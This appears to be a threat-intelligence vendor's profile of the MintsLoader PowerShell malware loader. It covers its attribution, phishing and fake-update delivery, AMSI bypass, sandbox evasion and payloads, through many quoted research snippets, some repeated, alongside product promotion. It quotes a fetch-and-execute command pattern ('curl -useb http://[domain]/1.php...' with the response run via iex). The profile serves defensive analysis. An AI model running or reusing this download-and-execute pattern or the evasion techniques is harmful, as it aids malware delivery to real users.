MintsLoader is a PowerShell-based, multi-stage malware loader active since at least February 2023. It is associated primarily with TAG-124, also tracked as LandUpdate808 and UNC4108; SocGholish/TA569 has also used it as a follow-on delivery chain since 2024. MintsLoader targets Windows systems, with observed campaigns affecting industrial, legal, energy, electricity, and oil-and-gas organizations in the United States and Europe.
The loader is distributed through phishing and spam messages, including Italian invoice-themed JScript attachments sent through compromised certified-email accounts; ClickFix/KongTuke social-engineering pages that induce users to execute commands; and fake browser-update lures served from compromised websites by SocGholish. Its staged JavaScript-to-PowerShell execution chain retrieves and decodes subsequent components, attempts to bypass AMSI, performs host profiling, and uses date-seeded domain-generation algorithms to locate delivery and command infrastructure.
MintsLoader uses WMI queries and system characteristics, including virtual-machine artifacts, processor, memory, graphics, display, and locale properties, to score the execution environment and evade analysis. It selectively delivers operational payloads to likely victim endpoints while serving decoy payloads, including AsyncRAT, to sandbox-like environments. Observed follow-on payloads include the GhostWeaver PowerShell remote-access trojan, the StealC information stealer, and modified BOINC clients. GhostWeaver is closely integrated with the MintsLoader ecosystem and can redeploy the loader through its plugin mechanism.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MintsLoader is a PowerShell-based, multi-stage malware loader that uses a JavaScript-to-PowerShell chain, environment scoring, and date-seeded DGA domains to deliver payloads.
MintsLoader is a PowerShell-based, multi-stage malware loader that uses a JavaScript-to-PowerShell chain, environment scoring, and date-seeded DGA domains to deliver payloads.
MintsLoader is a PowerShell-based, multi-stage malware loader that uses a JavaScript-to-PowerShell chain, environment scoring, and date-seeded DGA domains to deliver payloads.
KongTuke has also been seen using a wider kit, including WinPython, Node.js, finger.exe, a fake NexShield browser extension, the encrypted GateKeeper .NET payload, and loaders like MintsLoader and D3F@ck Loader.
Before the RAT arrives, a profiler called MintsLoader runs three checks on the target machine... When we submitted the delivery URLs to a sandbox, the server connected but withheld the payload.
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
23 distinct techniques documented for this family, organized by ATT&CK tactic.
MintsLoader ... sfrutta caselle PEC compromesse per inviare messaggi malevoli.
SocGholish operators inject fake browser update overlays on compromised websites. Visitors clicking the 'update' download MintsLoader instead of a legitimate browser update.
MintsLoader primarily delivers malicious RAT or infostealing payloads such as AsyncRAT and Vidar through phishing emails, targeting organizations in Europe (Spain, Italy, Poland, etc.).
The curl command is used again to invoke the request to the C2 and the response from the C2 is invoked again via iex.
Once decoded and decompressed, heavily obfuscated PowerShell bypasses AMSI, runs environment scoring, executes DGA to generate C2 domains, and calls back with score and system info.
Written in JavaScript and PowerShell, MintsLoader operates through a multi-step infection process involving several URLs and domains...
Obfuscation uses arithmetic character encoding where every string is constructed via math expressions without [char] casts.
MintsLoader ... sfrutta caselle PEC compromesse per inviare messaggi malevoli.
MintsLoader HTTP response returns Base64-encoded, XOR-decoded payload. Once decoded and decompressed, heavily obfuscated PowerShell...
In the wild that command sideloads a malicious vclimg370.bpl via a legitimate signed Embarcadero TRegSvr.exe.
The query parameters are built first by getting the computer name via the environment variable ComputerName...
Once active, SocGholish connects to its C2 infrastructure and deploys a variety of second-stage payloads.
Harvested data is exfiltrated to its command and control (C2) server using HTTP POST requests.
All paths converge on: curl -useb http://[domain]/1.php?s=[campaign_ID].
77 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
39 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
MintsLoader is the malware payload being distributed through a phishing campaign using compromised Italian PEC certified-email accounts and fake payment-reminder messages.
A payload loader delivered in the in-the-wild KongTuke ClickFix infection chain following DLL side-loading through TRegSvr.exe. The analyzed deception environment substituted an equivalent ZIP payload rather than detonating this exact chain.
A loader used in the broader KongTuke/Woodgnat toolset as part of flexible malware delivery methods.
A malware loader used by KongTuke to deliver additional payloads.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.